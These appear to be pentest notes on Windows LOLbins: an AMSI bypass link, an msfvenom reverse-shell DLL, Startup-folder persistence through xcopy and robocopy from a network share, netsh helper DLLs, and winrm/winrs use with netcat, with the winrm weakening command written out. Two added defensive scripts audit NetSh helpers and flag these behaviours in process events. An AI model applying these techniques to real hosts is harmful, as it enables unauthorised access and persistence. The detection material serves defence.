LOLbins

Some instances of LOLbins that I've looked at and found, on a fully patched Windows 10 host connecting back to a Kali machine.

https://www.contextis.com/en/blog/amsi-bypass

First run this to bypass AMSI. Then work out which AV engine your target uses and bypass it using one of these.



Reverse Shell .dll

Using msfvenom to generate a .dll that calls a TCP reverse shell.





Xcopy

Contents of trix.bat, to run the previously generated .dll via regsvr32.exe.

Xcopy then copies this .bat file into the C:\Users\IEUser\Start Menu\Programs\Startup directory; files placed in this directory are launched at startup and executed for the given user.

When the user then logs on, this .bat is executed, which in turn executes the .dll, and a reverse shell is spawned.





Robocopy

Robocopy then copies from a network share at \\10.0.2.11\ropnop\roprobo. Robocopy copies a whole directory, and contained within that directory are the trix.bat and trix.dll files.

As can be seen, this then causes the reverse shell to execute.









NetSh

Netsh has a function that makes it possible to load 'helper' DLLs, and it is able to load the previously generated msfvenom DLL.

Additionally, it is possible to gain persistence on a machine by running netsh.exe, which will then load the helper .dll whenever it is started.
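Netsh keeps its registered helpers in the registry under HKLM\SOFTWARE\Microsoft\NetSh, one value per helper whose data is the DLL name or full path, so that key is where a defender looks for the persistence described above. The following script is an added example and not part of these notes: it parses a constructed .reg export of that key and compares it against a constructed baseline of helper names captured from a known-good host. The helper names trix and helper2 are made up, the built-in-looking names are only filler, and the System32 location is an assumption passed in as a parameter.

```python
import re
from pathlib import PureWindowsPath

NETSH_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh"

# Constructed .reg export of the NetSh key. Real exports double every
# backslash inside string data, which is why the paths look like this.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh]
"dhcpmon"="dhcpmon.dll"
"ifmon"="ifmon.dll"
"fwcfg"="fwcfg.dll"
"trix"="C:\\Users\\IEUser\\trix.dll"
"helper2"="C:\\Windows\\System32\\wlancfg.dll"
'''

# Constructed baseline: helper names recorded on a known-good host of the
# same Windows build. In practice this comes from your own golden image.
BASELINE = {"dhcpmon", "ifmon", "fwcfg"}

VALUE_LINE = re.compile(r'^"([^"]+)"="(.*)"$')


def parse_helpers(reg_text: str, key: str = NETSH_KEY) -> dict:
    """Return {helper_name: dll_name_or_path} for the values under `key`."""
    helpers, in_key = {}, False
    for raw in reg_text.splitlines():
        line = raw.strip()
        if line.startswith("["):
            # A new key header; only collect values while inside the NetSh key.
            in_key = line.strip("[]").lower() == key.lower()
            continue
        m = VALUE_LINE.match(line)
        if in_key and m:
            name, value = m.group(1), m.group(2).replace("\\\\", "\\")
            helpers[name] = value
    return helpers


def audit_helpers(helpers: dict, baseline: set,
                  system_dir: str = r"C:\Windows\System32") -> list:
    """Flag helpers that are new relative to the baseline or that point
    outside the system directory. Returns (name, reason) tuples."""
    sysdir = PureWindowsPath(system_dir)
    known = {b.lower() for b in baseline}
    findings = []
    for name, dll in helpers.items():
        if name.lower() not in known:
            findings.append((name, "not_in_baseline"))
        path = PureWindowsPath(dll)
        # A bare file name resolves through the normal DLL search order;
        # an explicit path outside System32 is the interesting case.
        if len(path.parts) > 1 and not path.is_relative_to(sysdir):
            findings.append((name, "outside_system32"))
    return findings


if __name__ == "__main__":
    for name, reason in audit_helpers(parse_helpers(SAMPLE_REG), BASELINE):
        print(f"{name}: {reason}")
```

To run this against a live host, export the key with `reg export HKLM\SOFTWARE\Microsoft\NetSh netsh.reg` and read the file with `encoding="utf-16"`, since reg.exe writes Unicode exports. A bare file name passing the path check still deserves a look if it is not in the baseline, because the DLL search order could resolve it somewhere other than System32.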










Winrs

To allow winrs to be used, it is necessary to enable it, which is possible through the following command:

winrm quickconfig -quiet & winrm set winrm/config/Client @{AllowUnencrypted = "true"}

You can then use winrs to run commands via localhost. Here I used a netcat executable, nc64.exe, to get a reverse shell; however you could use regsvr32.exe or another LOLbin to execute a command.
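Every technique in these notes leaves a process-creation trail: xcopy or robocopy writing into a Startup folder (the Xcopy and Robocopy sections), regsvr32 loading a DLL from a user-writable path, netsh registering a helper, winrm being enabled or set to allow unencrypted traffic, and winrs launching a command. The script below is an added detection example, not part of the original notes: it runs a handful of rules over constructed events shaped like Sysmon Event ID 1 records (the field names Image, CommandLine and ParentImage follow Sysmon; the event contents, rule names and severities are my own), including two benign look-alikes that the rules must leave alone.

```python
import re
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Finding:
    rule: str
    severity: str   # "medium" or "high"
    event_id: int
    detail: str


# Constructed sample events shaped like Sysmon Event ID 1 (process creation).
# Events 1-6 mirror the behaviours in the notes above; 7 and 8 are benign
# look-alikes (installer registering a system DLL, ordinary backup job).
SAMPLE_EVENTS = [
    {"id": 1, "Image": r"C:\Windows\System32\xcopy.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'xcopy trix.bat "C:\Users\IEUser\Start Menu\Programs\Startup\"'},
    {"id": 2, "Image": r"C:\Windows\System32\Robocopy.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'robocopy \\10.0.2.11\ropnop\roprobo "C:\Users\IEUser\Start Menu\Programs\Startup"'},
    {"id": 3, "Image": r"C:\Windows\System32\regsvr32.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'regsvr32.exe /s "C:\Users\IEUser\Start Menu\Programs\Startup\trix.dll"'},
    {"id": 4, "Image": r"C:\Windows\System32\netsh.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"netsh add helper C:\Users\IEUser\trix.dll"},
    {"id": 5, "Image": r"C:\Windows\System32\cscript.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cscript //nologo "C:\Windows\System32\winrm.vbs" set winrm/config/Client @{AllowUnencrypted="true"}'},
    {"id": 6, "Image": r"C:\Windows\System32\winrs.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"winrs -r:localhost C:\Users\IEUser\nc64.exe"},   # netcat arguments omitted
    {"id": 7, "Image": r"C:\Windows\System32\regsvr32.exe", "ParentImage": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"regsvr32 /s C:\Windows\System32\scrrun.dll"},
    {"id": 8, "Image": r"C:\Windows\System32\Robocopy.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"robocopy C:\Data D:\Backup /MIR"},
]

STARTUP_DIR = re.compile(r"start menu\\programs\\startup", re.I)
UNC_SOURCE = re.compile(r"\\\\[\w.-]+\\\w")            # \\host\share
SYSTEM_DIR = re.compile(r"^[a-z]:\\windows\\", re.I)
MODULE_ARG = re.compile(r'"?([a-z]:\\[^"]+?\.(?:dll|ocx))"?', re.I)


def image_name(ev: dict) -> str:
    return ev["Image"].rsplit("\\", 1)[-1].lower()


def rule_startup_drop(ev: dict) -> Optional[Finding]:
    """Copy utilities writing into any user's Startup folder; a UNC source raises severity."""
    cmd = ev["CommandLine"]
    if image_name(ev) in {"xcopy.exe", "robocopy.exe"} and STARTUP_DIR.search(cmd):
        remote = bool(UNC_SOURCE.search(cmd))
        return Finding("startup_folder_drop", "high" if remote else "medium", ev["id"],
                       "copy utility writing into a Startup folder" + (" from a UNC share" if remote else ""))
    return None


def rule_regsvr32_user_path(ev: dict) -> Optional[Finding]:
    """regsvr32 loading a module that does not live under the Windows directory."""
    if image_name(ev) != "regsvr32.exe":
        return None
    m = MODULE_ARG.search(ev["CommandLine"])
    if m and not SYSTEM_DIR.match(m.group(1)):
        return Finding("regsvr32_unusual_module", "high", ev["id"], f"module loaded from {m.group(1)}")
    return None


def rule_netsh_helper(ev: dict) -> Optional[Finding]:
    if image_name(ev) == "netsh.exe" and re.search(r"\badd\s+helper\b", ev["CommandLine"], re.I):
        return Finding("netsh_helper_add", "high", ev["id"], "netsh helper DLL registered")
    return None


def rule_winrm_config(ev: dict) -> Optional[Finding]:
    """winrm quickconfig, or the client being switched to allow unencrypted traffic."""
    cmd = ev["CommandLine"]
    if re.search(r"winrm", cmd, re.I) and re.search(r'quickconfig|allowunencrypted\s*=\s*"?true', cmd, re.I):
        return Finding("winrm_weakened_or_enabled", "high", ev["id"], "WinRM enabled or set to allow unencrypted traffic")
    return None


def rule_winrs(ev: dict) -> Optional[Finding]:
    if image_name(ev) == "winrs.exe":
        m = re.search(r"-r:(\S+)", ev["CommandLine"], re.I)
        return Finding("winrs_remote_exec", "medium", ev["id"],
                       f"command run through winrs against {m.group(1) if m else 'unknown'}")
    return None


RULES = [rule_startup_drop, rule_regsvr32_user_path, rule_netsh_helper, rule_winrm_config, rule_winrs]


def scan(events: list) -> list:
    """Apply every rule to every event and collect the findings in event order."""
    return [f for ev in events for rule in RULES if (f := rule(ev)) is not None]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.severity:6}] event {f.event_id}: {f.rule} - {f.detail}")
```

The rules key on command-line content rather than on the parent process, so they also catch the winrm change when it arrives via winrm.cmd and cscript, as in event 5; on a real host, the same patterns map onto Sysmon or Windows Security 4688 events with command-line auditing enabled, and regsvr32 matches should additionally be checked against Sysmon Event ID 7 (image load) for the DLL path.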







References: Azeria's Persistence